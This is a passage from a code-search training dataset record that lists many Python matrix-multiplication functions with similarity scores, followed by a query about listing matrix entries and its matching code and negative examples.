[[0]*n for _ in range(n)]\n for i in range(n):\n for j in range(n):\n sm = 0\n for k in range(n):\n sm += (a[i][k] * b[k][j])\n c[i][j] = sm\n\n return c", "def multiply(A, B):\n\n if len(A[0]) != len(B):\n raise Exception(\"Matrix dimensions do not match for matrix multiplication: %d x %d and %d x %d\" % (len(A), len(A[0]), len(B), len(B[0])))\n\n result = [[0] * len(B[0]) for i in range(len(A))]\n\n for i in range(len(A)):\n for j in range(len(B[0])):\n\n result[i][j] = LinAl.dot(A[i], LinAl.transpose(B)[j])\n\n return result", "def matrix_product(mat1: List[List[int]], mat2: List[List[int]]):\n if len(mat1) == 0 or len(mat2) == 0:\n raise ValueError(\"One of matrix is empty\")\n n, k1 = len(mat1), len(mat1[0])\n k2, m = len(mat2), len(mat2[0])\n if k1 != k2:\n raise ValueError(\n f\"Can't multiply two matrices with shapes {n}x{k1} and {k2}x{m}\"\n )\n mat2_t = matrix_transpose(mat2)\n return [[vec_product(vec1, vec2) for vec2 in mat2_t] for vec1 in mat1]", "def __mul__(self, other):\n\n # Scalar multiplication\n if isinstance(other, (int, long, float, complex)):\n return Matrix(self.rows, self.columns, [other * x for x in self.data])\n\n if not issubclass(type(other), Matrix):\n raise TypeError(type(other))\n\n if self.columns != other.rows:\n raise ValueError(\"Undefined multiplication for these matrices\")\n\n result = []\n for i in range(1, self.rows + 1):\n row = self.row(i)\n result.extend([dot_product(row, other.column(j)) for j in range(1, other.columns + 1)])\n\n return Matrix(self.rows, other.columns, data = result)", "def __matmul__(self, other):\n return F.MatMul.apply(self, other)", "def __mul__(self, other):\n if isinstance(other, Vector):\n # Matrix vector product\n v = Vector(list())\n for n in range(len(other.vectors)):\n v += scale(other.vectors[n][n], self.vectors[n])\n return v\n elif isinstance(other, Matrix):\n # Matrix matrix product\n if self.n != other.m:\n raise ValueError(\"Wrong fucking sizes, nøøb\")\n\n selfVectors = self.vectors\n selfColVectors = self.transpose()\n otherVectors = other.vectors\n otherColVectors = other.transpose()\n vectors = list()\n for col in range(other.n):\n cordinator = []\n\n for row in range(self.m):\n coord = 0\n\n for k in range(other.m):\n coord += (\n selfVectors[row].coords[k]\n * otherColVectors.vectors[col].coords[k]\n )\n\n cordinator.append(coord)\n\n v = Vector(cordinator)\n vectors.append(v)\n matrix = Matrix(vectors)\n matrix = matrix.transpose()\n return matrix\n elif isinstance(other, int) or isinstance(other, float): # Skalering af matrix\n for i in range(len(self.vectors)):\n self.vectors[i] *= other\n else:\n raise ValueError(\n \"Can only multiply Matrix with Matrix, Vector, Integer or Float\"\n )", "def calculate_matmul(mat_a, mat_b):\n assert mat_a.shape[-2] == 1 and mat_b.shape[-1] == 1\n return tf.reduce_sum(tf.squeeze(mat_a, -2) * tf.squeeze(mat_b, -1), axis=2, keepdims=True)", "def __mul__(self, other):\n return Matrix3(\n self.i * other,\n self.j * other,\n self.k * other,\n )", "def _matmult(A, x):\n b = []\n for a in A:\n b.append(sum([ai * xi for ai, xi in zip(a, x)]))\n return b", "def __mul__(self, otherMatrix):\n if not (len(self.array[0]) == len(otherMatrix.array)):\n raise ArithmeticError\n\n common = len(self.array[0])\n X = len(self.array)\n Y = len(otherMatrix.array[0])\n newArray = [[0 for x in range(X)] for x in range(Y)]\n\n for row in range(X):\n for col in range(Y):\n for elem in range(common):\n newArray[row][col] += self.array[row][elem] * otherMatrix.array[elem][col]\n\n\n return matrix(newArray)", "def matrix_multiply(x, y):\r\n\r\n # handle the base case of receiving\r\n # two empty matrices\r\n if x == [] and y == []:\r\n return []\r\n\r\n # determine the number of rows and columns in the result matrix\r\n num_rows = len(x)\r\n num_cols = len(y[0])\r\n\r\n num_cross = len(x[0])\r\n\r\n # initialize the result matrix\r\n result_matrix = [[0] * num_cols for _ in xrange(num_rows)]\r\n\r\n # compute the values for each cell of the result\r\n # matrix\r\n for row_index in xrange(num_rows):\r\n for col_index in xrange(num_cols):\r\n\r\n # sum up the corresponding values from\r\n # x and y\r\n for multiplication_index in xrange(num_cross):\r\n\r\n x_value = x[row_index][multiplication_index]\r\n y_value = y[multiplication_index][col_index]\r\n\r\n result_matrix[row_index][col_index] += x_value * y_value\r\n\r\n return result_matrix", "def __mul__(self, other):\n if isinstance(other, (int, float)):\n newmat = make_matrix(self.rows, self.cols)\n for i in range(newmat.rows):\n for j in range(newmat.cols):\n newmat[i, j] = self[i, j] * other\n elif isinstance(other, Matrix):\n if self.cols != other.rows:\n raise IndexError(\"Row/column mismatch: (%i, %i) x (%i, %i)\"%\n (self.rows, self.cols, other.rows, other.cols))\n\n newmat = make_matrix(self.rows, other.cols)\n\n for i in range(newmat.rows):\n for j in range(newmat.cols):\n for k in range(self.cols):\n newmat[i, j] += self[i, k] * other[k, j]\n return newmat", "def multiplication(self):\n try:\n multiplication = self.matrix1 * self.matrix2\n except Exception as e:\n return \"Error: {}\".format(e)\n\n return multiplication", "def matrix_dot(*args):\r\n rval = args[0]\r\n for a in args[1:]:\r\n rval = theano.tensor.dot(rval, a)\r\n return rval", "def __matmul__(self, tensor):\n return self.matmul(tensor)", "def multiply(A, B, *args, **kwargs):\n dim=A.__len__()\n assert(dim==B.__len__())\n C=[]\n for ii in range(dim):\n shape=(A[ii].shape[0]*B[ii].shape[0], A[ii].shape[1])\n val=np.empty(shape)\n for iimn, (mm, nn) in enumerate(itertools.product(list(range(A[ii].shape[0])), list(range(B[ii].shape[0])))):\n val[iimn] = A[ii][mm]*B[ii][nn]\n C.append(val)\n return C", "def matrix_multiplication_loop(x_matrix, y_matrix):\n result = []\n for i, row in enumerate(x_matrix):\n row_vector = []\n for j in range(len(y_matrix[0])):\n product = 0\n for k in range(len(row)):\n product += x_matrix[i][k] * y_matrix[k][j]\n row_vector.append(product)\n result.append(row_vector)\n return result", "def matr_prod(_A, _B):\r\n # Matrix multiplication\r\n B0 = _B[0]\r\n lenB = len(_B)\r\n lenA = len(_A)\r\n if(len(_A[0]) != lenB): # Check matrix dimensions \r\n Exception('Matrices have wrong dimensions')\r\n if(isinstance(B0, list) or isinstance(B0, array) or isinstance(B0, tuple)): #_B is matrix\r\n lenB0 = len(B0)\r\n C = [[0 for row in range(lenB0)] for col in range(lenA)]\r\n for i in range(lenA):\r\n for j in range(lenB0):\r\n for k in range(lenB):\r\n C[i][j] += _A[i][k]*_B[k][j]\r\n else: #_B is vector\r\n C = [0 for row in range(lenB)]\r\n for i in range(lenA):\r\n for k in range(lenB):\r\n C[i] += _A[i][k]*_B[k]\r\n return C", "def __matmul__(self, csys):\n self._transform(csys)\n return self", "def StrassenMatrixM(a, b):\r\n if len(a) != 2 or len(a[0]) != 2 or len(b) != 2 or len(b[0]) != 2:\r\n raise Exception('Matrices should be 2x2!')\r\n print(a[0][0] * b[0][1] + a[0][1] * b[1][1])\r\n matrix = [[a[0][0] * b[0][0] + a[0][1] * b[1][0], a[0][0] * b[0][1] + a[0][1] * b[1][1]],\r\n [a[1][0] * b[0][0] + a[1][1] * b[1][0], a[1][0] * b[0][1] + a[1][1] * b[1][1]]]\r\n\r\n return matrix", "def transforms_multiply(t0s, t1s):\r\n \r\n return ut.matrix_multiply(t0s, t1s)", "def __mul__(self, other):\n if not isinstance(other, Matrix):\n return NotImplemented\n\n if self.num_cols != other.num_rows:\n raise ValueError(\"self.num_cols (%d) != other.num_rows (%d)\" % (self.num_cols, other.num_cols))\n\n new_mat = Matrix(self.num_rows, other.num_cols)\n\n # iterate through rows of self\n for i in range(self.num_rows):\n # iterate through columns of other\n for j in range(other.num_cols):\n # iterate through rows of other\n for k in range(other.num_rows):\n new_mat[i, j] += self[i, k] * other[k, j]\n\n return new_mat", "def __mul__(self, oth):\n\t\tif isinstance(oth, Matrix) or isiterable(oth):\n\t\t\t# matrix\n\t\t\toth_m = oth\n\t\t\tif not isinstance(oth_m, Matrix):\n\t\t\t\toth_m = Matrix(oth_m)\t\t\t\n\t\t\tres_m = self._mat_mul(oth_m)\n\t\t\tif isinstance(oth, Matrix):\n\t\t\t\treturn res_m\n\t\t\telse:\n\t\t\t\treturn type(oth)(res_m._unnest())\n\t\telse:\n\t\t\t# scalar\n\t\t\treturn Matrix._make_new(lambda i,j: self.data[i][j] * oth, self.rows, self.cols)", "def naive_multiply(a, b):\n m = len(a) # Number of rows in first matrix\n k = len(b) # Number of rows in the second matrix\n res = []\n p = len(b[0])\n n = k\n for q in range(m):\n res.append([0])\n for q in range(m):\n for w in range(p - 1):\n res[q].append(0)\n for i in range(m):\n for j in range(p):\n for r in range(n):\n res[i][j] = a[i][r] * b[r][j] + res[i][j]\n return res", "def mult_img_matrix(imgs, matrix):\n nimgs, ny, nx = imgs.shape\n\n vec = np.reshape(imgs, [nimgs, ny * nx])\n vec_out = matrix.dot(vec)\n imgs_out = np.reshape(vec_out, [nimgs, ny, nx])\n\n return imgs_out", "def test_matmul_mm(self):\n self.check_dot_mm(matmul_usecase, None, \"'@'\")", "def matmul(x, y):\n if len(list(y.size())) == 2:\n # if one of them is a vector (i.e. wanting to do MV mult)\n z = torch.zeros(2, x.size()[1], dtype=torch.double, device=x.device)\n z[0] = torch.mv(x[0], y[0]) - torch.mv(x[1], y[1])\n z[1] = torch.mv(x[0], y[1]) + torch.mv(x[1], y[0])\n\n if len(list(y.size())) == 3:\n z = torch.zeros(\n 2, x.size()[1], y.size()[2], dtype=torch.double, device=x.device\n )\n z[0] = torch.matmul(x[0], y[0]) - torch.matmul(x[1], y[1])\n z[1] = torch.matmul(x[0], y[1]) + torch.matmul(x[1], y[0])\n\n return z", "def __matmul__(self, other):\n if isinstance(other, types.Vector):\n return self.apply(target=other)\n if isinstance(other, MatrixLieGroup):\n return self.multiply(other=other)\n else:\n assert False, \"Invalid argument\"", "def __mul__(self, scalar):\n m, n = self.shape\n scalar = mpfr(scalar)\n data = dict()\n for i in range(m):\n for j in range(n):\n data[i, j] = self[i, j] * scalar\n return MPMatrix((m, n), data)", "def matrix_mult(A,B,mod=10**9+7):\n C = [[1,1],[1,1]]\n C[0][0] = ((A[0][0]*B[0][0])%mod + (A[0][1]*B[1][0])%mod)%mod\n C[0][1] = ((A[0][0]*B[0][1])%mod + (A[0][1]*B[1][1])%mod)%mod\n C[1][0] = ((A[1][0]*B[0][0])%mod + (A[1][1]*B[1][0])%mod)%mod\n C[1][1] = ((A[1][0]*B[0][1])%mod + (A[1][1]*B[1][1])%mod)%mod\n return C", "def python_nonsquare_matrix_mult(matrix):\n\n transposed_matrix = np.zeros([matrix.shape[1],matrix.shape[0]])\n start = time.time()\n # for i in range(matrix.shape[0]):\n # for j in range(matrix.shape[1]):\n # transposed_matrix[j,i] = matrix[i,j]\n\n transposed_matrix = np.transpose(matrix)\n product = matrix.dot(transposed_matrix)\n\n # transposed_matrix = np.transpose(matrix)\n end = time.time()-start\n\n # print(\"Python Golden Transpose: %s\" % product)\n # print('python transpose time: %.2E' % end)\n return [product, end]", "def matrix_dot(*args):\n rval = args[0]\n for a in args[1:]:\n rval = tm.dot(rval, a)\n return rval", "def multiply(self, b):\n assert(self.Dimension == b.Dimension)\n p = []\n for meb in b.Elements:\n for mea in self.Elements:\n if mea.j == meb.i:\n temp = mea.val * meb.val\n temp = MatrixElement(mea.i, meb.j, temp)\n p.append(temp)\n p = SparseMatrix(len(p), p)\n #print(p)\n return p", "def combine_one_matrices(mul):\n factor, args = mul.as_coeff_matrices()\n new_args = [args[0]]\n\n for B in args[1:]:\n A = new_args[-1]\n if not isinstance(A, OneMatrix) or not isinstance(B, OneMatrix):\n new_args.append(B)\n continue\n new_args.pop()\n new_args.append(OneMatrix(A.shape[0], B.shape[1]))\n factor *= A.shape[1]\n\n return newmul(factor, *new_args)", "def __mul__(self, other):\n if isinstance(other, (int, float)):\n return Matrix([[self.values[row][index] * other\n for index in range(len(self.values[0]))]\n for row in range(len(self.values))])\n\n elif isinstance(other, Vector):\n return Vector([other.dot(Vector(row)) for row in self.values])\n\n elif isinstance(other, Matrix):\n return Matrix([(other.transpose() * Vector(row)).values\n for row in self.values])", "def __mul__(self,other):\n # \n # 注意矩阵的A的列 与 相乘矩阵B的行必须相等,才能进行运算\n height = 0\n width = 0\n if isinstance(other, list): # 判断other是否是矩阵,即list形式的矩阵\n height = len(other)\n width = len(other[0])\n else:\n # 如果是对象,则直接获取行列值\n height = other.h\n width = other.w\n\n\n my_mul = zeroes(self.h, self.w)\n if self.w == height: # 两个矩阵的行列值需要相等 才能相乘\n for i in range(self.h):\n for j in range(width):\n my_sum = 0\n for k in range(height):\n if isinstance(other, list):\n my_sum += self.g[i][k] * other[k][j]\n # 通过3个循环变量取所有矩阵的行列值\n else:\n my_sum += self.g[i][k] * other.g[k][j]\n my_mul[i][j] = my_sum\n return my_mul \n else:\n return NotImplementedError", "def calculate_matmul_n_times(n_components, mat_a, mat_b):\n res = np.zeros(mat_a.shape)\n mat_a = tf.cast(mat_a, tf.double)\n mat_b = tf.cast(mat_b, tf.double)\n for i in range(n_components):\n mat_a_i = tf.squeeze(mat_a[:, i, :, :], -2)\n mat_b_i = tf.squeeze(mat_b[0, i, :, :])\n res[:, i, :, :] = tf.expand_dims(tf.matmul(mat_a_i, mat_b_i), 1)\n\n return tf.convert_to_tensor(res)", "def matmul(A, B):\n # type: (Optional[Tensor], Tensor) -> Tensor\n if A is None:\n return B\n if is_sparse(A):\n return torch.sparse.mm(A, B)\n return torch.matmul(A, B)", "def matrix_add():", "def __mul__(left, right):\n \n if isinstance(left, Plucker) and isinstance(right, Plucker):\n # reciprocal product\n return np.dot(left.uw, right.v) + np.dot(right.uw, left.v)\n elif isinstance(left, Plucker) and arg.ismatrix(right, (4,None)):\n return left.skew @ right; # postmultiply by 4xN", "def __mul__(self, other):\n N = self.matrix.shape[1]\n\n if isinstance(other, _PysparseMatrix):\n return _PysparseMatrix(matrix=spmatrix.matrixmultiply(self.matrix, other.matrix))\n else:\n shape = numerix.shape(other)\n if shape == ():\n L = spmatrix.ll_mat(N, N, N)\n L.put(other * numerix.ones(N, 'l'))\n return _PysparseMatrix(matrix=spmatrix.matrixmultiply(self.matrix, L))\n elif shape == (N,):\n y = numerix.empty((self.matrix.shape[0],))\n self.matrix.matvec(other, y)\n return y\n else:\n raise TypeError", "def my_matmul(x, y):\n ##\n cmd = getattr(th, \"matmul\")\n x1, x2 = my_cut(x)\n y1, y2 = my_cut(y)\n x2y1 = cmd(x2, y1)\n x1y2 = cmd(x1, y2)\n x2y2 = cmd(x2, y2)\n ret = (x2y1 + x1y2) % int24field * int24field + x2y2\n ret = int48module(ret)\n return ret", "def Mult(self, *args):\n return _hypre.HypreParMatrix_Mult(self, *args)", "def add_matrices(m1, m2): \n output = []\n \n for index in range(len(m1)):\n row_1 = m1[index]\n row_2 = m2[index]\n new_row = []\n for index2 in range(len(row_1)):\n sum = row_1[index2] + row_2[index2]\n new_row.append(sum)\n output.append(new_row)\n return output", "def __mul__(self, other):\n if hasattr(other, 'as_homogenous_transformation'):\n return basis(homogenous_transformation = self.as_homogenous_transformation() * other.as_homogenous_transformation())\n elif hasattr(other, 'n'):\n if other.n == (3,1):\n b = matrix.col((other[0], other[1], other[2], 1))\n elif other.n == (4,1):\n b = other\n else:\n raise TypeError(b, \"Incompatible matrices\")\n p = self.as_homogenous_transformation() * b\n if other.n == (3,1):\n return matrix.col(p[0:3])\n else:\n return p\n else:\n raise TypeError(b)", "def chain_matmul_square(As):\n\n As_matmul = As\n while As_matmul.shape[0] > 1:\n if As_matmul.shape[0] % 2:\n A_last = As_matmul[-1:]\n else:\n A_last = None\n \n As_matmul = torch.matmul(As_matmul[0:-1:2], As_matmul[1::2])\n if A_last is not None:\n As_matmul = torch.cat([As_matmul, A_last], dim=0)\n \n return As_matmul.squeeze(0)" ]
[ "0.839403", "0.77877283", "0.7786913", "0.76345795", "0.7578386", "0.752093", "0.7499151", "0.7495682", "0.74534243", "0.7433087", "0.74056447", "0.73597676", "0.7326738", "0.732322", "0.7322675", "0.731054", "0.72843087", "0.7257866", "0.72538614", "0.7223289", "0.7222726", "0.72109926", "0.7210884", "0.7193421", "0.71875936", "0.71751803", "0.7163928", "0.71602404", "0.7155903", "0.7155264", "0.7137124", "0.7122708", "0.7121784", "0.7111911", "0.71113205", "0.70916426", "0.7086545", "0.70816576", "0.70795447", "0.7077852", "0.70775175", "0.7033606", "0.7033606", "0.7029227", "0.7028709", "0.699483", "0.69830054", "0.69756466", "0.69481534", "0.6940633", "0.6936434", "0.69152826", "0.6908271", "0.68917704", "0.6884037", "0.6880783", "0.6856087", "0.6835476", "0.6832661", "0.68229556", "0.6805816", "0.68014777", "0.67662555", "0.67474926", "0.674167", "0.6732484", "0.6722109", "0.6704609", "0.66893065", "0.66819334", "0.6656226", "0.6628479", "0.66209966", "0.6617495", "0.6610446", "0.6609819", "0.6606465", "0.6603155", "0.6601432", "0.659203", "0.6590573", "0.6587667", "0.65850896", "0.65682054", "0.6558304", "0.6546407", "0.65379286", "0.652602", "0.6522618", "0.6500239", "0.64959496", "0.6460276", "0.644583", "0.6435343", "0.6418276", "0.64123225", "0.64027333", "0.6394951", "0.63910294", "0.6379685", "0.6375029" ]
0.0
-1
r""" Return the list of entries of this matrix.
def list(self): return [self[i,j] for i in range(self._d) for j in range(self._d)]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def as_list(self):\n data = []\n for row in self._matrix_data:\n for column in row:\n data.append(column)\n return data", "def rows(self):\n return list(self)", "def as_list_of_lists(self):\n return self._matrix_data", "def readentries(self):\n return list(x for x in self)", "def entries(self):\n out = []\n for y,x in self.coords(False):\n out.append((y,x,self.retrieve(y,x)))\n return out", "def rows(self):\n return self._row_list", "def entries(self):\n return self._entries", "def entries(self):\n return self._entries", "def rows(self) -> List[List]:\n return self._rows", "def get_entries(self) -> List[Entry]:\n return list(self.__entries)", "def getEntries(self):\n return self.entries", "def rows(self):\n return self.row", "def getEntries(self):\n return self.__entries", "def to_list_flat(self):\n return self.rep.entries()", "def get_data(self) -> List[List[int]]:\n sudoku_array = []\n for row in self.entries:\n sudoku_array.append([0 if entry.text == '' else int(entry.text) for entry in row])\n return sudoku_array", "def list(self):\n return self.cell.objects+self.cell.tempObjects", "def values(self):\n return [row.values for row in self]", "def At_list(self):\n return self.Atom_list", "def to_list(self):\n return self.main_list[:self.num_elements]", "def tolist (self) :\r\n if self.complex :\r\n result = []\r\n for x in xrange(0,len(self)) :\r\n result.append(self[x])\r\n return result\r\n else :\r\n return self.impl.tolist()", "def entries():\n\n\treturn [entry.value for entry in db.session.query(Entry).all()]", "def rows(self):\n return self.Rows(self)", "def cols(self):\n\n return []", "def get_entries(self):\n return self._netdis.loxone.entries", "def get_rows(self):\n return utils.copy_matrix(self.board)", "def entries(self) -> \"list[tuple[Codepoint, EffectiveWidth]]\":\n result = list(self.entry_set)\n result.sort()\n return result", "def list(self):\n return self._get_list()", "def to_list(self):\n return self._elements", "def list_of_neighbors(self):\n return self.to_coo_matrix().tolil().rows.tolist()", "def get_values(self):\n \n return []", "def toList(self, rowmajor=0):\r\n if rowmajor:\r\n return copy.copy(self.mlist)\r\n else:\r\n return self.transpose().mlist", "def get_list(self):\n return sorted(self.__entries.keys())", "def values(self):\n self._values = [[cell for cell in row]\n for row in self.sheet._op.values]\n # self._values = [cell for row in self.sheet._op.values for cell in row]\n return self._values", "def as_matrix(self):\n return self._data", "def rows(self):\n # NOTE: To avoid duplicating large objects, this is just the\n # mutable private data.\n return self._rows", "def values(self) -> list:\n return self.__values", "def values(self):\n return [ self[x] for x in self ]", "def entries(self):\n return [self._entries[key] for key in self._order]", "def get_entries(\n self,\n entry\n ):\n\n try:\n return self._cache[self._alias[entry]]\n except:\n pass\n\n if entry in self._header:\n \n # get the index\n idx = self._header[entry]\n\n entries = []\n\n for row in self._array:\n tmp = [0 for i in row]\n for i,cell in enumerate(row):\n if cell != 0:\n tmp[i] = self[cell][idx]\n entries.append(tmp)\n\n # add entries to cache\n self._cache[self._alias[entry]] = entries\n\n return entries", "def to_list(self):\n return self.rep.tolist()", "def entries(self):\n if not self._lines:\n self._load_file()\n\n return tuple(self._lines)", "def values(self):\n x = []\n for k in list(self.keys()):\n x.append(self[k])\n return x", "def matrix(self):\n return np.matrix(list(self._columns.values()))", "def all(self):\n self.scan()\n return self.entries", "def values(self):\n values = []\n for key in self.keys():\n values.append(self[key])\n return values", "def get_rows(self) -> List[List[str]]:\n return self.content", "def rows(self):\r\n raise NotImplementedError", "def values(self):\r\n return [self[k] for k in self]", "def tolist(self):\n \n ret = []\n \n for e in self:\n ret.append(e)\n \n return ret", "def matrix(self):\n return self._matrix", "def matrix(self):\n return self._matrix", "def data(self) -> List[List[Any]]:\n\n column_wise = [column.values for column in self.plaincolumns]\n row_wise = [list(row) for row in zip(*column_wise)]\n\n return row_wise", "def cells_list(self):\n xx, yy = np.meshgrid(self.x_spacings, self.y_spacings)\n return np.vstack([yy.ravel(), xx.ravel()]).transpose()", "def array(self):\n return list(self.sequence)", "def getAll(self):\n return self.__lst", "def getList(self):\n return self.position.exportToList()", "def getContents(self):\r\n cont=[]\r\n for i in range (len(self._indices)):\r\n cont.append(self._dataset.getPoint(self._indices[i]))\r\n return cont", "def columns(self) -> List[List]:\n return list(map(list, zip(*self.rows)))", "def to_list(self):\n return list(self.data)", "def values(self):\n\t\treturn self.myVals", "def arr(self):\n return self._arr", "def get_list(self):\r\n return self.numbers", "def to_list(self) -> list:\n return self.A.tolist()", "def lists(self):\n return dict.items(self)", "def get_displayed_data(self):\n displayed_data = []\n disp_entry_positions = range(self.first_displayed_entry, self.last_displayed_entry+1)\n #print(\"Displayed entries: {}\".format(disp_entry_positions))\n for entry_num in disp_entry_positions:\n is_active = entry_num == self.pointer\n displayed_entry = self.render_displayed_entry(entry_num, active=is_active)\n displayed_data += displayed_entry\n #print(\"Displayed data: {}\".format(displayed_data))\n return displayed_data", "def get_matrix(self):\n return self._matrix[:3, :]", "def array(self):\n return array(self.get_values())", "def cells(self) -> List[Tuple[int, int]]:\n return self._cells", "def getitems(self):\n if self.onlydiag():\n return self.getdiag()\n else:\n return self.items()", "def values(self) -> List:\n pass", "def get_all(self):\n list = []\n line = self.get()\n while line:\n list.append(line)\n line = self.get()\n return list", "def list(self) -> List:\n return list(self.values())", "def values(self) -> ndarray:\n return self._vals", "def matrix_features(self):\n return self._matrix_features", "def get_entries(self) -> Generator[str, None, None]:\n return (entry for entry in self.entries)", "def infolist(self):\r\n return list(self.infoiter())", "def get_values(self) -> list:\r\n values = []\r\n for key, value in self._items:\r\n values.append(value)\r\n return values", "def as_list(self):\n g = self.args[0]\n H = self.args[1]\n cst = []\n if str(self._dir) == '+':\n for h in H.elements:\n cst.append(h*g)\n else:\n for h in H.elements:\n cst.append(g*h)\n return cst", "def ui_getrow(self):\n return [self.locked*'L',self.idx,self.guid,printsz(self.size),\n printsz(self.cachesize),self.vendor,self.model,\n len(self.paths),len(self.partitions),len(self.usedinluns)\n ]", "def get_conn_matrix_vector(self):\n\n vect = []\n for line in sorted(self.connection_matrix):\n for item in self.connection_matrix[line]:\n vect.append(item)\n\n return vect", "def rows(self):\r\n raise NotImplementedError()", "def array(self):\n return self.get_array()", "def list(self):\n return [self.x, self.y, self.z]", "def rows(self) -> java.util.Collection:\n ...", "def data(self) -> List[ndarray]:\n return self._data", "def get_rows(self):\n rowlist = []\n if self.direction == \"horizontal\":\n rowlist.append(int(self.position[0][0]))\n return rowlist\n else:\n rowlist.append(int(self.position[0][0]))\n rowlist.append(int(self.position[1][0]))\n if self.size == 3:\n rowlist.append(int(self.position[2][0]))\n return rowlist", "def values(self):\r\n return self.__values", "def lines(self):\n return self.lines", "def cells(self):\n return chain.from_iterable(self.cols)", "def values(self):\n return [i.value for i in self.value]", "def values(self):\n return [self[k] for k in self.keys()]", "def values (self):\n return self._values", "def values (self):\n return self._values", "def vals(self) -> ndarray:\n return self._vals", "def __iter__(self) -> Iterator[Tuple[K, List[V]]]:\n return (entry for entry in self._table.items())", "def values(self):\n return self._values", "def values(self):\n return self._values", "def values(self):\n return self._values", "def values(self):\n return self._values", "def columns(self):\n return self.__column_list" ]
[ "0.74211484", "0.7351907", "0.7139602", "0.7107239", "0.7102002", "0.7040875", "0.700234", "0.700234", "0.69514894", "0.6915959", "0.6805772", "0.68021935", "0.67886513", "0.6775163", "0.6770315", "0.6736421", "0.67067957", "0.66475236", "0.6628927", "0.66164464", "0.65946597", "0.6570721", "0.6539913", "0.653377", "0.65327", "0.6511432", "0.6499319", "0.6491782", "0.64409816", "0.6394279", "0.6361168", "0.63452286", "0.63422114", "0.63421136", "0.6338142", "0.63303053", "0.63302374", "0.6320387", "0.6305276", "0.6293655", "0.6290904", "0.6276081", "0.6273789", "0.62736857", "0.6239219", "0.6236895", "0.6233921", "0.6232702", "0.62302876", "0.6221393", "0.6221393", "0.62197894", "0.6206175", "0.620273", "0.6199111", "0.6197966", "0.6194342", "0.61911935", "0.6186292", "0.6184974", "0.6183829", "0.61828524", "0.61765933", "0.61715543", "0.61708647", "0.6166792", "0.61667436", "0.61441207", "0.613997", "0.61338234", "0.61179703", "0.61110413", "0.6110968", "0.6110922", "0.61051065", "0.6104968", "0.6102537", "0.60994464", "0.6090314", "0.60887617", "0.6076425", "0.60702175", "0.6069222", "0.6068846", "0.6060944", "0.60536057", "0.6046299", "0.6045127", "0.6043226", "0.60410035", "0.6037136", "0.60338265", "0.60338265", "0.603062", "0.6028495", "0.6018327", "0.6018327", "0.6018327", "0.6018327", "0.60057735" ]
0.69504046
9
r""" Return the list of equal coefficients between self and other.
def equal_coefficients(self, other): d = self._d return [(i,j) for i in range(d) for j in range(d) \ if self[i][j] == other[i][j]]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __xor__(self, other):\n\n sym_diff = [value for value in self if value not in other]\n sym_diff.extend([value for value in other if value not in self])\n\n return sym_diff", "def GetEqualConstrains(self):\n return _gmat_py.Spacecraft_GetEqualConstrains(self)", "def coefficients(self) :\n raise NotImplementedError", "def coefficients(self) :\n return self.__coefficients", "def __pow__(self, other):\n n = len(self)\n\n v = zeros_como(self)\n\n for i in range(n):\n v[i] = self[i]**other\n\n return v", "def coefficients(self):\n return self._coefficients", "def coefficients(self):\n return self._coefficients", "def __sub__(self, other: 'ModelParameters') -> 'ModelParameters':\n return ModelParameters([self[idx] - other[idx] for idx in range(len(self))])", "def coefficients(self) -> np.ndarray:\n return self._coefficients", "def get_coefficients(self):\n return self.coefficients", "def get_coefficients(self):\n return self.coefficients", "def __xor__(self, other):\n a, b = Trits.match_length(self, other)\n return Trits([x ^ y for x, y in zip(a, b)])", "def getEquates(self) -> Iterator[ghidra.program.model.symbol.Equate]:\n ...", "def __isub__(self, other):\n self.components = [c1 - c2 for (c1, c2) in zip(self, other)]\n return self", "def __sub__( self, other ) :\n\n try :\n other = float( other )\n c_ls = self.copy( )\n for l, c_l in enumerate( c_ls ) : c_ls.coefficients[l] -= other\n except :\n self.checkSameSeriesType( other )\n c_l1, c_l2 = self.coefficients, other.coefficients\n if( len( self ) < len( other ) ) : c_l1, c_l2 = c_l2, c_l1\n c_ls = c_l1.copy( )\n for l, c_l in enumerate( c_l2 ) : c_ls.coefficients[l] += c_l\n return( c_ls )", "def pd(self, other):\n return Matriz([self]).T() * Matriz([other])", "def find_coefficients(self):\n self.make_matrix()\n self.coeffs = np.linalg.solve(self.global_matrix,self.global_vector)\n self.coeffs = np.append(self.coeffs, self.D) #Initial condition", "def __eq__(self, other):\n if self.coeff != other.coeff:\n return False\n \n if self.GetKeggID() != other.GetKeggID():\n return False\n \n if self.phase.Name() != other.phase.Name():\n return False\n \n return True", "def test_coefficient_orders(self):\n for i in range(2, 5):\n spec = {2*j: 0 for j in range(i)}\n bcs_ref = BoundaryConditions(spec, 2*i-2)\n bcs_main = BoundaryConditions(spec, 2*i)\n\n coeffs_ref = get_ext_coeffs(bcs_ref)[i-1]\n coeffs_main = get_ext_coeffs(bcs_main)[i-1]\n\n assert coeffs_ref == coeffs_main", "def enthalpy_equality_func(self):\n residual = []\n for i in range(self.num_i):\n residual += [self.inl[i].h.val_SI - self.outl[i].h.val_SI]\n return residual", "def coefficients(self, force_characters = False) :\n raise NotImplementedError", "def __xor__(self, other):\r\n return self + other - 2 * self * other", "def IsEqualOrder(self,other):\n return self.InferPolynomialDegree() == other.InferPolynomialDegree()", "def coefficients(self):\r\n return self.coef_['x']", "def __isub__(self, other):\n self.components = [c1 - c2 for (c1, c2) in zip(self.components, other.components)]\n return self", "def __sub__(self, other):\n # \n # TODO - your code here\n #\n result = [];\n for i in range(self.h):\n result.append([a-b for a,b in zip(self.g[i],other.g[i])]);\n \n return Matrix(result);", "def __and__(self, other):\n\n return [value for value in self if value in other]", "def commutator(self, other) -> 'MultiVector':\n\n return ((self * other) - (other * self)) / 2", "def commutes_with(self, other):\n if not isinstance(other, type(self)):\n raise TypeError(\n 'Can only test commutation with another MajoranaOperator.')\n\n if len(self.terms) == 1 and len(other.terms) == 1:\n return _majorana_terms_commute(\n list(self.terms.keys())[0],\n list(other.terms.keys())[0])\n return self * other == other * self", "def __sub__(self, other):\n return Vector([c1 - c2 for (c1, c2) in zip(self.components, other.components)])", "def a_coefficients(y1,y2):\n\tACoefficients = np.array([\ty1, \\\n\t\t\t\t\t\t\t\ty2 ]).astype(float)\n\treturn(ACoefficients)", "def __xor__(self, other: t.Any) -> InspectableSet[_C]:\n return self._op_copy('__xor__', other)", "def rhs_atoms(self):\n\n return itertools.chain(self.rhs_names, self.rhs_funcs)", "def difference(self, other): # type: (Term) -> Term\n return self.intersect(other.inverse)", "def getSmoothnessABC(self,other):\n\t\tif not self.sectors == other.sectors:\n\t\t\traise ValueError(\"Sectors do not 